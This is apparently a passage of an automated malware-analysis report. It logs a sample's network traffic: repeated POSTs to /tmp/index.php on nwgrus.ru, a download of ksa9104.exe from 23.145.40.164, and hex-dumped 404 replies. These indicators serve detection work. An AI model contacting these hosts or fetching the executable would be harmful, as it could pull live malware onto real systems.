      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtsymdwebcyefo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmpymujrwfied.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlfyuywbsduqi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xasjtfaqoixq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fedsyouolon.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbemhhdwkax.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tihslqvhibr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vltcfypculmuiq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://emfnibhwebsi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sawtavgcrgnnv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttpnojrymdictnko.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdiwjkiticrn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uedxkfpodrvnuu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmiqpftbbfl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eguapsteeivf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmyhnxbsgfyxxpwc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://olbmmmarqkp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhxlvwfcbrqijpck.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://stpaxqpyogea.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hvlkumwrcebxfc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wuwimcitsicpgplo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqvctgowbce.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ranxxolmdknfcjg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqxuhbjviiy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbnguovvbpjawi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bkopsfqneci.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ugrocofopkun.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yilmrbbiqbh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
